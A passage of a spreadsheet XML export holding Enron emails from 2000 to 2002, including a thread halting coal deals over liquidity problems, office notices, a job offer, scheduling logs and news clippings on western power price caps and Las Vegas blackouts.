I just got you email, but I do want to be in on the gift for Becky.  Count me _x000D_
in for $20.  I'll bring the money down in the morning.  Where are you located _x000D_
now?_x000D_
_x000D_
Thanks,_x000D_
Robin</t>
  </si>
  <si>
    <t>Mon, 12 Nov 2001 07:00:33 -0800 (PST)</t>
  </si>
  <si>
    <t>RE: Coal Deals</t>
  </si>
  <si>
    <t>Bill - please set a time to meet today - will try to get Jeff as well.  Thanks._x000D_
_x000D_
George_x000D_
_x000D_
-----Original Message-----_x000D_
From: Bradford, William S. _x000D_
Sent: Sunday, November 11, 2001 10:38 AM_x000D_
To: Mcclellan, George_x000D_
Cc: Suttle, John_x000D_
Subject: RE: Coal Deals_x000D_
_x000D_
_x000D_
George,_x000D_
_x000D_
I would be happy to discuss with you.  It remains critical that we manage all cash requirements as our access to capital markets has been impacted over the past few weeks.  Hopefully the announcement on Friday will improve our ability to execute transactions like this in future, but prior to Friday this was a necessary precaution.  Unfortunately, you are working at a different company than you were a few weeks ago._x000D_
_x000D_
We can discuss next week._x000D_
_x000D_
Bill_x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
From: Mcclellan, George _x000D_
Sent: Friday, November 09, 2001 7:51 PM_x000D_
To: Suttle, John; Peters, Jez; Staley, Stuart; Miyai, Tark; Bauer, Adam;_x000D_
Nimmo, Matthew; Bradford, William S._x000D_
Subject: RE: Coal Deals_x000D_
_x000D_
_x000D_
John / Bill - talk with me in Houston on Monday - we ain't operating like this.  _x000D_
George_x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
From:	Suttle, John_x000D_
Sent:	Fri 11/9/2001 12:36 PM_x000D_
To:	Peters, Jez; Staley, Stuart; Miyai, Tark; Bauer, Adam; Nimmo, Matthew; Bradford, William S._x000D_
Cc:	Mcclellan, George_x000D_
Subject:	RE: Coal Deals_x000D_
_x000D_
The Bengalla deal was struck after I had given ECAP notice of the liquidity problems, and more importantly, without any RAC involvement._x000D_
_x000D_
From a RAC perspective this deal is still unapproved.  If an invoice discount facility can be used, or some other means of performing without using Enron capital then you should move forward.  If these options are not available, then the issue should either be raised to Louise Kitchen for approval or unwound until the liquidity problems are resolved._x000D_
_x000D_
John_x000D_
_x000D_
	 -----Original Message-----_x000D_
	From: 	Peters, Jez  _x000D_
	Sent:	Thursday, November 08, 2001 5:17 PM_x000D_
	To:	Staley, Stuart; Suttle, John; Miyai, Tark; Bauer, Adam; Nimmo, Matthew; Bradford, William S._x000D_
	Cc:	Mcclellan, George_x000D_
	Subject:	RE: Coal Deals_x000D_
_x000D_
	needless to say we need some clarification here - Bengalla deal is alreday in forward motion in that coal being delivered to port as of today and we have commitments which we need to source for. Please call._x000D_
_x000D_
	thks_x000D_
	Jez_x000D_
_x000D_
		 -----Original Message-----_x000D_
		From: 	Staley, Stuart  _x000D_
		Sent:	Friday, 9 November 2001 5:54 AM_x000D_
		To:	Suttle, John; Miyai, Tark; Peters, Jez; Bauer, Adam; Nimmo, Matthew; Bradford, William S._x000D_
		Cc:	Mcclellan, George_x000D_
		Subject:	RE: Coal Deals_x000D_
_x000D_
		John:_x000D_
_x000D_
		I assume this does not apply to ECTRL business, as we have not been given a reciprocal recommendation for European biz.  Can you confirm this?  Also, can you clarify what the specific issue is with ECAP that is not an issue with ECTRL?  Is this specific to cash flow within Australian entities?_x000D_
_x000D_
		Thanks,_x000D_
_x000D_
		Stu_x000D_
_x000D_
			 -----Original Message-----_x000D_
			From: 	Suttle, John  _x000D_
			Sent:	08 November 2001 17:42_x000D_
			To:	Miyai, Tark; Peters, Jez; Staley, Stuart; Bauer, Adam; Nimmo, Matthew; Bradford, William S._x000D_
			Subject:	Coal Deals_x000D_
_x000D_
			In light of the current situation in Houston, I recommend we wait to finalize any physical coal sourcing or deliveries in the ECAP business.  In short, RAC cannot approve any purchase or sale until the liquidity issues are resolved.  Hopefully by the end of the week we will know more, have things settled, and business can continue as normal._x000D_
_x000D_
			Please call me if you have any questions._x000D_
_x000D_
			John_x000D_
			281-345-8264</t>
  </si>
  <si>
    <t>Thu, 7 Jun 2001 13:27:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'dispute@ix.netcom.com'})</t>
  </si>
  <si>
    <t>frozenset({'info@orlj.com'})</t>
  </si>
  <si>
    <t>Oregon Law Journal:  June 2001 Issue</t>
  </si>
  <si>
    <t>Oregon Law Journal June 2001: The site is up waiting for you: Many new _x000D_
articles, recent cases, case summaries, federal court news, Attorney General _x000D_
news, US Supreme Court cases including medical marijuana, two Texas lawyers _x000D_
have an article on Telemedicine, (issues that are similar to _x000D_
multijurisdictional law practice issues), Steve Bass from PC World is back, _x000D_
writing about Web Privacy matters,? articles on recent employment cases and _x000D_
on? recent land use cases appear and much? more is on the site.? A new _x000D_
feature is our archive directory by article title - look that over. _x000D_
_x000D_
For our Washington lawyers we have a new site: _x000D_
Washington Law Journal at: http://www.washingtonlawjournal.com _x000D_
_x000D_
Here is the link for the Oregon Law Journal: _x000D_
http://www.oregonlawjournal.com</t>
  </si>
  <si>
    <t>Fri, 29 Sep 2000 11:08:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>eThink About It: October 2, 2000</t>
  </si>
  <si>
    <t>It's another big week for eSpeak, with two thought-provoking events._x000D_
Join us Wednesday, October 4 at 10:00 am Houston time for Harry Arora, vice _x000D_
president of eCommerce.  Harry will be answering your questions about _x000D_
DealBench._x000D_
Thursday, October 5 at 10:00 am Houston time, Beth Tilney, managing director _x000D_
of marketing and communication, will be on hand to discuss Enron's new _x000D_
employee satisfaction survey:  The Pulse._x000D_
We hope you'll be able to participate in both events, but if you can't, be _x000D_
sure to pre-submit your questions on the eSpeak site._x000D_
_x000D_
_x000D_
Incubate your intelligence.  How?  First, recognize you have competitive _x000D_
intelligence.  Second, go to the Edge and post competitive intelligence. It's _x000D_
that easy.  We'll look for you on the Edge._x000D_
_x000D_
_x000D_
Stop by eMeet today and see the latest posting in the Office of the Chairman _x000D_
category.  And, remember, this is a discussion forum.  Feel free to add your _x000D_
thoughts to what the Office of the Chairman has to say.</t>
  </si>
  <si>
    <t>Wed, 27 Sep 2000 03:51:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Fwd: Deer Valley</t>
  </si>
  <si>
    <t>Tell him it is firm.  We are obligating ourselves no matter what.  And tell _x000D_
him thank you again.  See you tonight pretty lady._x000D_
PL</t>
  </si>
  <si>
    <t>frozenset({'toni.graham@enron.com', 'robert.superty@enron.com'})</t>
  </si>
  <si>
    <t>Toni:  I would like to extend an offer to Cynthia Lara.  I interviewed her _x000D_
last week.  The offer should be $58,000/year.  If you have any questions just _x000D_
let me know or contact Patti Sullivan @ x30494 or Bob Superty.  Thanks for _x000D_
your help.</t>
  </si>
  <si>
    <t>Tue, 8 Jan 2002 01:36:45 -0800 (PST)</t>
  </si>
  <si>
    <t>Start Date: 1/8/02; HourAhead hour: 4;</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
Start Date: 1/8/02; HourAhead hour: 4;  No ancillary schedules awarded.  Variances detected._x000D_
Variances detected in Load schedule. _x000D_
_x000D_
    LOG MESSAGES:_x000D_
_x000D_
PARSING FILE --&gt;&gt; O:\Portland\WestDesk\California Scheduling\ISO Final Schedules\2002010804.txt_x000D_
_x000D_
---- Load Schedule ----_x000D_
$$$ Variance found in table tblLoads._x000D_
     Details: (Hour: 4 / Preferred:   2.25 / Final:   2.22)_x000D_
  TRANS_TYPE: FINAL_x000D_
  LOAD_ID: PGE1_x000D_
  MKT_TYPE: 2_x000D_
  TRANS_DATE: 1/8/02_x000D_
  SC_ID: ENRJ_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Sat, 23 Feb 2002 08:01:57 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'jfawcett@sempra.com'})</t>
  </si>
  <si>
    <t>frozenset({'a..howard@enron.com', 'lorraine.lindberg@enron.com', 'kevin.hyatt@enron.com', 'william.plunkett@enron.com'})</t>
  </si>
  <si>
    <t>Giving more than 100%</t>
  </si>
  <si>
    <t xml:space="preserve"> Giving more than 100%_x000D_
_x000D_
Ever wonder about those people who say they are giving more than 100%?_x000D_
We have all been to those meetings where someone wants over 100%._x000D_
How about achieving 103%?     _x000D_
 _x000D_
Here's a little math that might prove helpful: _x000D_
_x000D_
What makes life 100%?_x000D_
If A B C D E F G H I J K L M N O P Q R S T U V W X Y Z is_x000D_
represented as:_x000D_
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 1819 20 21 22 23 24 25 26_x000D_
 _x000D_
Then:_x000D_
H A R D W O R K_x000D_
8 1 18 4 23 15 18 11 = 98%_x000D_
_x000D_
K N O W L E D G E_x000D_
11 14 15 23 12 5 4 7 5 = 96%_x000D_
_x000D_
But,_x000D_
A T T I T U D E_x000D_
1 20 20 9 20 21 4 5 = 100%_x000D_
And,_x000D_
B U L L S H I T_x000D_
2 21 12 12 19 8 9 20 = 103%_x000D_
_x000D_
So, it stands to reason that hard work and knowledge will get you_x000D_
close, attitude will get you there, but bullshit will put you over the top._x000D_
 </t>
  </si>
  <si>
    <t>Tue, 2 Apr 2002 13:08:52 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve"> _x000D_
-----Original Message-----_x000D_
From: Bond, Ragan _x000D_
Sent: Tuesday, April 02, 2002 10:54 AM_x000D_
To: 'daryl.landry@bp.com'_x000D_
Subject: FW: _x000D_
_x000D_
_x000D_
 _x000D_
-----Original Message-----_x000D_
From: Bond, Ragan _x000D_
Sent: Thursday, March 28, 2002 4:14 PM_x000D_
To: Connett, Hugh_x000D_
Subject: FW: _x000D_
_x000D_
_x000D_
 _x000D_
-----Original Message-----_x000D_
From: Randle [mailto:rbelyeu@ev1.net]_x000D_
Sent: Tuesday, March 26, 2002 6:46 PM_x000D_
To: Bond, Ragan_x000D_
Subject: _x000D_
_x000D_
_x000D_
 </t>
  </si>
  <si>
    <t>Fri, 2 Nov 2001 08:49:18 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'travis.mccullough@enron.com', 'pinto.leite@enron.com', 'harlan.murphy@enron.com', 'peter.del@enron.com', 'brent.hendry@enron.com', "lech'.'kalembka@enron.com", 't..hodge@enron.com', 'tanya.rohauer@enron.com', "rick'.'antonoff@enron.com", 'peter.keohane@enron.com', 'steve.van@enron.com', 'elizabeth.sager@enron.com', 'n..gray@enron.com', 'paul.simons@enron.com', 'morris.clark@enron.com', 'angela.davis@enron.com', 'john.viverito@enron.com', 'gerald.nemec@enron.com', 'carol.st.@enron.com', 'sara.shackleton@enron.com', 'marcus.von@enron.com', 'h..douglas@enron.com', 'frank.sayre@enron.com', 'marie.heard@enron.com', 'c..koehler@enron.com', 'tana.jones@enron.com', 'david.portz@enron.com', 'julia.murray@enron.com', 'alan.aronowitz@enron.com', 'lisa.mellencamp@enron.com', 'credit &lt;.williams@enron.com&gt;', 'mary.cook@enron.com', 'leslie.hansen@enron.com'})</t>
  </si>
  <si>
    <t>RE: Master Netting Agreements Status Upsdates: READ</t>
  </si>
  <si>
    <t>DO GO AHEAD AND CC ROHAUER.  I AM SORRY FOR THE CONFUSION.  IT IS BRADFORD AND KITCHEN THAT DO NOT WANT THE DETAIL._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Cook, Mary  _x000D_
Sent:	Friday, November 02, 2001 10:47 AM_x000D_
To:	Antonoff, Rick; Aronowitz, Alan; Clark, Morris; Cook, Mary; Davis, Angela; Del vecchio, Peter; Douglas, Stephen H.; Evans, Mark (London Legal); Gray, Barbara N.; Hansen, Leslie; Heard, Marie; Hendry, Brent; Hodge, Jeffrey T.; Jones, Tana; Kalembka, Lech; Keohane, Peter; Koehler, Anne C.; Leite, Francisco Pinto; McCullough, Travis; Mellencamp, Lisa; Murphy, Harlan; Murray, Julia; Nemec, Gerald; Portz, David; Rohauer, Tanya; Sager, Elizabeth; Sayre, Frank; Shackleton, Sara; Simons, Paul; St. Clair, Carol; Van Hooser, Steve; Viverito, John; Von Bock Und Polach, Marcus; Williams, Jason R (Credit)_x000D_
Subject:	Master Netting Agreements Status Upsdates: READ_x000D_
Importance:	High_x000D_
_x000D_
_x000D_
DO NOT SEND YOUR STATUS UPDATES TO KITCHEN, BRADFORD, ROHAUER, JUST TO ST. CLAIR AND COOK.  WE WILL SUMMARIZE FOR THEM, THEY DO NOT WANT SEPARATE EMAILS FROM EVERYONE.  THANKS._x000D_
_x000D_
Cordially,_x000D_
Mary Cook_x000D_
Enron North America Corp._x000D_
1400 Smith, 38th Floor, Legal_x000D_
Houston, Texas 77002-7361_x000D_
(713) 345-7732_x000D_
(713) 646-3393 (fax)_x000D_
mary.cook@enron.com</t>
  </si>
  <si>
    <t>Tue, 14 Nov 2000 05:30:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'asayegh@emirates.net.ae'})</t>
  </si>
  <si>
    <t>Presentation file</t>
  </si>
  <si>
    <t xml:space="preserve">As mentioned in my previous message, another one of the presentations that I _x000D_
attempted to send to you earlier is attached below._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 30 Nov 2000 05:28:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'john.griffith@enron.com', 'les.webber@enron.com'})</t>
  </si>
  <si>
    <t>Southern Company Services Contract</t>
  </si>
  <si>
    <t xml:space="preserve">Les,_x000D_
_x000D_
ENA's current contract with Southern Co. Services.  _x000D_
_x000D_
Can you forward to John and I the contracts we have with El Paso that you _x000D_
outlined today?_x000D_
---------------------- Forwarded by Phil DeMoes/Corp/Enron on 11/30/2000 _x000D_
01:11 PM ---------------------------_x000D_
_x000D_
_x000D_
Cyndie Balfour-Flanagan_x000D_
09/13/2000 10:47 AM_x000D_
To: Phil DeMoes/Corp/Enron@ENRON_x000D_
cc:  _x000D_
_x000D_
Subject: Southern Company Services Contract_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Cyndie Balfour-Flanagan/Corp/Enron on _x000D_
09/13/2000 10:45 AM ---------------------------_x000D_
_x000D_
_x000D_
Cyndie Balfour-Flanagan_x000D_
09/12/2000 03:05 PM_x000D_
To: Tammi DePaolis/Corp/Enron@ENRON_x000D_
cc:  _x000D_
_x000D_
Subject: Southern Company Services Contract_x000D_
_x000D_
Attached is the only CES contract with Southern Company Services as "true" _x000D_
counterparty (listed on the contract instead of having a letter issued later _x000D_
naming Southern Company Services as Agent). I could not find any specific _x000D_
deal data; but the contractual provisions should give you what you are _x000D_
looking for. Please let me know if I can help with anything else or if we _x000D_
need to dig deeper (into CES non-listed data hopefully with Porter &amp; Hedges)._x000D_
_x000D_
Cyn_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 13 Dec 2000 00:37:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'georgene.moore@enron.com', 'sigrid.macpherson@enron.com', 'pamela.daily@enron.com', 'mary.weatherstone@enron.com', 'tiko.reynolds@enron.com', 'sara.shackleton@enron.com', 'airam.arteaga@enron.com', 'shirley.kaiser@enron.com', 'alexia.gonzales@enron.com', 'monica.roberts@enron.com'})</t>
  </si>
  <si>
    <t>Priority Locker Selection-Women's</t>
  </si>
  <si>
    <t xml:space="preserve">In anticipation of re-opening, you have an opportunity to pre-select your new _x000D_
locker location.  All active Body Shop members who had a permanent locker at _x000D_
the time of the September 1st construction close have been given first _x000D_
consideration when selecting their new locker location before December 29th.  _x000D_
 Priority will be given to member's original locker location (i.e. a member _x000D_
who requests their original locker area will be given priority for that _x000D_
space).  After this date lockers will be distributed to members on the _x000D_
waiting list and to member's with permanent lockers who request a different _x000D_
space from their original locker area.   For your convenience, a Body Shop _x000D_
enrolment and locker request table will be in the lobby from December 18th _x000D_
through January 5th between the hours of 11am - 1:30pm. _x000D_
_x000D_
_x000D_
_x000D_
Follow these simple steps to secure your locker location:_x000D_
Open and review the attached Women's Locker Design template._x000D_
Select your 1st, 2nd, and 3rd choice location preference._x000D_
Complete the Locker Selection Request Form.  _x000D_
Complete and Sign the Locker Payroll Deduction Form._x000D_
Return all completed forms before December 29th to the Body Shop at EB1355, _x000D_
drop off at our offices on EB1372 or at the Body Shop Table in the lobby from _x000D_
December 18th through January 5th between the hours of 11am - 1:30pm._x000D_
_x000D_
You will receive an e-mail notifying you of your new locker location and _x000D_
locker combination prior to re-opening.  If you have any questions, please _x000D_
contact the Body Shop Front Desk at  x35547._x000D_
</t>
  </si>
  <si>
    <t>Mon, 8 Jan 2001 00:09:00 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">Hey Dad,_x000D_
We would love to meet ya'll for dinner.  Just let me know when. The only _x000D_
night we can't is Friday._x000D_
_x000D_
Love,_x000D_
e_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"Larry W. Bass" &lt;lwbthemarine@bigplanet.com&gt; on 01/07/2001 08:18:22 PM_x000D_
To: eric preston bass &lt;Eric.Bass@enron.com&gt;_x000D_
cc:  _x000D_
Subject: _x000D_
_x000D_
_x000D_
_x000D_
Good evening Son. Seems like forever since we have  talked. Hope your week _x000D_
was good and next week is better. Lets get together for  lunch or dinner next _x000D_
week. Stay in touch. Love  you-Dad_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 29 Mar 2001 00:16:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Los Angeles Dept. of Water &amp; Power</t>
  </si>
  <si>
    <t xml:space="preserve">Debra,_x000D_
 Here is the new contract.  Please forward by mail and email as requested _x000D_
below._x000D_
           Dan_x000D_
----- Forwarded by Dan J Hyvl/HOU/ECT on 03/29/2001 08:14 AM -----_x000D_
_x000D_
	Jason R Williams/ENRON@enronXgate_x000D_
	03/28/2001 06:00 PM_x000D_
		 _x000D_
		 To: Debra Perlingiere/HOU/ECT@ECT, Dan J Hyvl/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: Los Angeles Dept. of Water &amp; Power_x000D_
_x000D_
Debra and Dan -_x000D_
_x000D_
Last worksheet from me for a while.  Please prepare a draft and send to:_x000D_
_x000D_
_x000D_
Mr. Bob Pettinato_x000D_
Los Angeles Department of Water &amp; Power_x000D_
10322 Sunland Blvd._x000D_
Sunland, CA 91040_x000D_
_x000D_
_x000D_
Please email a copy to me and to Kim Ward._x000D_
_x000D_
_x000D_
Thanks,_x000D_
_x000D_
Jay_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 4 Apr 2001 14:18:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'ray.alvarez@enron.com', 'christian.yoder@enron.com', 'tim.belden@enron.com', 'mark.fischer@enron.com', 'tim.heizenrader@enron.com', 'chris.mallory@enron.com', 'robert.badeer@enron.com', 'michael.etringer@enron.com', 'stephen.swain@enron.com', 'susan.mara@enron.com', 'jeff.richter@enron.com', 'michael.driscoll@enron.com', 'tom.alonso@enron.com', 'mike.swerzbin@enron.com', 'steve.hall@enron.com', 'phillip.platter@enron.com', 'carla.hoffman@enron.com', 'diana.scholtes@enron.com', 'matt.motley@enron.com', 'sean.crandall@enron.com', 'elliot.mainzer@enron.com', 'christopher.calger@enron.com', 'jeff.dasovich@enron.com', 'joe.hartsoe@enron.com'})</t>
  </si>
  <si>
    <t>House Democrats Unveil Calif Power Price Cap Legislation</t>
  </si>
  <si>
    <t xml:space="preserve">But they don't have the votes ...._x000D_
_x000D_
House Democrats Unveil Calif Power Price Cap Legislation    _x000D_
Updated: Wednesday, April 4, 2001 06:32 PM ET     _x000D_
  _x000D_
WASHINGTON (Dow Jones)--House Democrats introduced legislation Wednesday _x000D_
directing the U.S. Federal Energy Regulatory Commission to impose cost-based _x000D_
price caps in the Western U.S. _x000D_
_x000D_
_x000D_
The measure was unveiled at a press conference, where Western-state Democrats _x000D_
and House Minority Leader Richard Gephardt, D-Mo., criticized the Bush _x000D_
administration and House Republicans for inaction in response to the looming _x000D_
electricity shortage expected to spur blackouts and extreme price spikes in _x000D_
California and neighboring states this summer. _x000D_
_x000D_
The legislation and criticism spurred immediate reactions from House _x000D_
Republicans. _x000D_
_x000D_
_x000D_
"Capping wholesale prices won't solve the problem. It will only complicate _x000D_
the solution," said Rep. Billy Tauzin, R-La., chairman of the House Energy _x000D_
and Commerce Committee. _x000D_
_x000D_
_x000D_
"We want to help California. But strangling incentives to invest in the _x000D_
state's power infrastructure, in my opinion, would have a devastating impact _x000D_
on California's economy," Tauzin said. _x000D_
_x000D_
_x000D_
House Energy and Clean Air Subcommittee Chairman Joe Barton, R-Texas, _x000D_
defended his planned Western-state electricity relief legislation, which _x000D_
doesn't contain a price-cap mandate. _x000D_
_x000D_
_x000D_
"We are involved, and if there is a feasible federal solution, we will find _x000D_
it and see it passed," Barton vowed. _x000D_
_x000D_
_x000D_
-By Bryan Lee, Dow Jones Newswires; 202-862-6647; bryan.lee@dowjones.com _x000D_
_x000D_
_x000D_
 _x000D_
 </t>
  </si>
  <si>
    <t>Wed, 21 Feb 2001 17:26:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Get objectives for M Lokay</t>
  </si>
  <si>
    <t xml:space="preserve">	TASK ASSIGNMENT_x000D_
_x000D_
_x000D_
Status:		completed_x000D_
_x000D_
Task Priority:		1_x000D_
Task Due On:		6/27/2000_x000D_
Task Start Date:	6/27/2000</t>
  </si>
  <si>
    <t>Fri, 19 May 2000 04:42:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'lenine.jeganathan@enron.com', 'brian.hoskins@enron.com', 'brettlawler@hotmail.com', 'hector.campos@enron.com'})</t>
  </si>
  <si>
    <t>More than Just a Flag - By J.J. Johnson</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Eric Bass/HOU/ECT on 05/19/2000 11:41 AM _x000D_
---------------------------_x000D_
_x000D_
_x000D_
"Larry W. Bass" &lt;lwbthemarine@bigplanet.com&gt; on 05/19/2000 11:27:43 AM_x000D_
To: peggy dan maynard &lt;peggy@airmail.net&gt;, Pam Day &lt;pkjday@yahoo.com&gt;, _x000D_
michael don ferguson &lt;mfe252@mail.airmail.net&gt;, "Marsters, Linda" _x000D_
&lt;lmarsters@fortbend.k12.tx.us&gt;, kathy bass &lt;daphneco@earthlink.net&gt;, Julie &amp; _x000D_
Mark Stevens &lt;JUMACK@airmail.net&gt;, joni drude &lt;jfdr@chevron.com&gt;, jason _x000D_
&lt;jason.bass2@compaq.com&gt;, "Henry C. McGill" &lt;hmcgill-satx@worldnet.att.net&gt;, _x000D_
gail stoops &lt;Ggstops@aol.com&gt;, Frank Marsters &lt;marstersco@earthlink.net&gt;, _x000D_
eric preston bass &lt;Eric.Bass@enron.com&gt;, christine marsters _x000D_
&lt;wxranch@airmail.net&gt;, Bill Daniel &lt;bdaniel@pflash.com&gt;, beth dahlberg _x000D_
&lt;dhlbrg@aol.com&gt;, Barbara Bass &lt;xwb2@flash.net&gt;, Andrea Lyles _x000D_
&lt;andrearonnie@cs.com&gt;, ryan darr &lt;fastfeet15@aol.com&gt;, richard and marty darr _x000D_
&lt;Rdarr@flash.net&gt;, lauren darr &lt;L2giveJ@aol.com&gt;_x000D_
cc:  _x000D_
Subject: More than Just a Flag - By J.J. Johnson_x000D_
_x000D_
_x000D_
_x000D_
Kathy sent this to me. Very interesting perspective  from a black man _x000D_
concerning the Confederate flag and similar  issues.-L_x000D_
_x000D_
?http://www.sierratimes.com/edjj041400.htm#top_x000D_
 - More than Just a Flag - By J.J. Johnson.url_x000D_
</t>
  </si>
  <si>
    <t>Fri, 12 Jan 2001 05:06:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'jdahl@mrportland.com'})</t>
  </si>
  <si>
    <t>Request for update</t>
  </si>
  <si>
    <t>Vince,_x000D_
Hopefully you have had a chance to look at Mr. Valverde's resume.  Please_x000D_
let me know if you have an interest in talking with him or not._x000D_
Thank you._x000D_
_x000D_
Johan_x000D_
_x000D_
JOHAN C. DAHL_x000D_
Director Energy Staffing Group_x000D_
Management Recruiters of Portland, Inc._x000D_
Phone: 503-290-1153_x000D_
Fax: 503-282-4380_x000D_
E-mail: jdahl@mrportland.com_x000D_
Web: http://www.mrportland.com</t>
  </si>
  <si>
    <t>Tue, 3 Jul 2001 03:37:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'sarah.novosel@enron.com', 'dave.perrino@enron.com', 'janel.guerrero@enron.com', 'jeff.dasovich@enron.com', 'christi.nicolay@enron.com', 'mark.palmer@enron.com', 'paul.kaufman@enron.com', 'susan.mara@enron.com'})</t>
  </si>
  <si>
    <t>LV valley endures blackouts</t>
  </si>
  <si>
    <t xml:space="preserve">  Now here's an "unintended" consequence:  price caps cause less supply to be _x000D_
available (marketers cannot sell above cap and generators must be subject to _x000D_
cost filings if they do) and the result is black outs._x000D_
_x000D_
Alan_x000D_
 _x000D_
 Tuesday, July 03, 2001_x000D_
Copyright , Las Vegas Review-Journal _x000D_
_x000D_
POWER SHORTAGES: LV valley endures blackouts_x000D_
Utility officials expect supplies to stay tight as hot weather continues this _x000D_
week _x000D_
_x000D_
By JOHN G. EDWARDS _x000D_
REVIEW-JOURNAL _x000D_
_x000D_
_x000D_
_x000D_
The first rolling blackouts in Southern Nevada history hit the Las Vegas _x000D_
Valley on Monday with a speed that surprised even Nevada Power Co. _x000D_
_x000D_
The utility company declared a red alert and initiated rolling blackouts that _x000D_
left an estimated 10,000 customers without power. It had reported 70,000 _x000D_
customers were affected but later revised the number of customers who lost _x000D_
electricity. _x000D_
_x000D_
The blackouts started at 4:10 p.m. and ended at 4:55 p.m., the utility said. _x000D_
_x000D_
Nevada Power attributed the power shortages to several factors: unusually _x000D_
high temperatures for this time of year, three generation unit outages, the _x000D_
area's rapid growth, power shortages in California and, possibly, the _x000D_
wholesale power price caps that federal regulators imposed last month. _x000D_
_x000D_
"What killed us was the temperature was unbelievable," said Paul Heagan, vice _x000D_
president of Sierra Pacific Resources, the holding company for Nevada Power. _x000D_
The Las Vegas temperature soared to a near-record 114 degrees. _x000D_
_x000D_
As for the rest of the week, "power (supply) is going to be tight," Heagan _x000D_
said. "The prospects this week are kind of tough to call." _x000D_
_x000D_
The company logged record demand for power: 4,421 megawatts at 5:05 p.m. _x000D_
Monday. The previous all-time high was 4,325 megawatts on Aug. 1. A megawatt _x000D_
is roughly the amount of power needed to supply 750 houses. _x000D_
_x000D_
By contrast, on July 2 last year, the utility hit 3,300 megawatts when the _x000D_
temperature was 107 degrees, Heagan said. _x000D_
_x000D_
The company targeted nonemergency areas for Monday's rolling blackouts, which _x000D_
affected mostly residential customers. _x000D_
_x000D_
Nevada Power spokesmen declined to identify the affected areas even after the _x000D_
emergency was over. Witnesses said power went out in one area of the _x000D_
Northwest and one area of the east valley. _x000D_
_x000D_
Electricity customers in the affected areas said the blackouts lasted between _x000D_
20 and 45 minutes. _x000D_
_x000D_
Several traffic signals went out, including those at the intersections of _x000D_
Buffalo Drive and Lake Mead Boulevard, Tenaya Way and Lake Mead, and Boulder _x000D_
Highway at U.S. Highway 95. Las Vegas Police Department officials reported _x000D_
few traffic problems because of the blackouts. _x000D_
_x000D_
For the most part, people reported few problems. _x000D_
_x000D_
"We only had a few customers, and we couldn't do Western Union transactions _x000D_
without a computer, but with the other customers we just winged it," said _x000D_
Michelle Hitt, a customer service representative at Mail Boxes Etc., 7500 W. _x000D_
Lake Mead Blvd. Hitt said power at his store was out about 45 minutes. _x000D_
_x000D_
Across the street, an assistant manager for the Vons supermarket at 7530 W. _x000D_
Lake Mead Blvd. said customers could not check out when the store's power _x000D_
turned off. _x000D_
_x000D_
The Roadhouse Grill at Lake Mead Boulevard and Tenaya Way was shut down for _x000D_
about 25 minutes shortly after 4 p.m., restaurant manager Kim Tuerk said. _x000D_
_x000D_
"We had to evacuate the building because of health department and fire codes, _x000D_
but it was no big deal," he said. _x000D_
_x000D_
Heagan said Nevada Power will start its rolling blackouts in other areas of _x000D_
the valley if it needs to cut power again this week. _x000D_
_x000D_
The utility's policy calls for no notification to areas that will lose power, _x000D_
unlike California, where a minimum of 24 hours notice is required. _x000D_
_x000D_
Nevada Power fears that notification would be used by burglars to locate _x000D_
unoccupied houses during the emergency. _x000D_
_x000D_
Tim Hay, state consumer advocate, said he thinks customers in affected areas _x000D_
should be notified of possible outages. "They need to provide notice to _x000D_
affected areas, at least in general areas" to help people prepare, Hay said. _x000D_
_x000D_
Elsewhere in the valley, consumers and businesses continued operating _x000D_
normally during the emergency. _x000D_
_x000D_
Meadows mall General Manager Frank Wheat said power was not affected at the _x000D_
shopping center. _x000D_
_x000D_
"We know rolling blackouts can occur," he said. "We do have backup generators _x000D_
for emergency lighting during hours of darkness, but not for all the stores." _x000D_
_x000D_
Spokespeople at University Medical Center and Sunrise Hospital also said they _x000D_
were not affected by Monday's blackouts and have their own backup power _x000D_
supplies. _x000D_
_x000D_
Minta Albietz, vice president of maternal-child services at Sunrise: _x000D_
_x000D_
"We have our own little power plant in the back. We can generate our own _x000D_
power for 30 days, longer as long as we have fuel." _x000D_
_x000D_
The company said its power woes began Friday when it internally declared a _x000D_
yellow alert and warned employees that it was running short of power, Heagan _x000D_
said. _x000D_
_x000D_
On Friday, Nevada Power customers were pulling down 4,300 megawatts, the _x000D_
second- or third-highest peak in the company history, he said. _x000D_
_x000D_
Meanwhile, one of Nevada Power's electrical generation units at the Reid _x000D_
Gardner site 50 miles north of Las Vegas has been down since Friday because _x000D_
of a leaking boiler, he said. Also, Southern California Edison, which _x000D_
operates the Mohave Generating Station at Laughlin for several utilities, _x000D_
notified the company Friday that two of Nevada Power's units were down. _x000D_
_x000D_
Nevada Power said it was able to obtain additional power on the spot market _x000D_
and avoid blackouts last week and did not need to seek any power use _x000D_
curtailment by major users. _x000D_
_x000D_
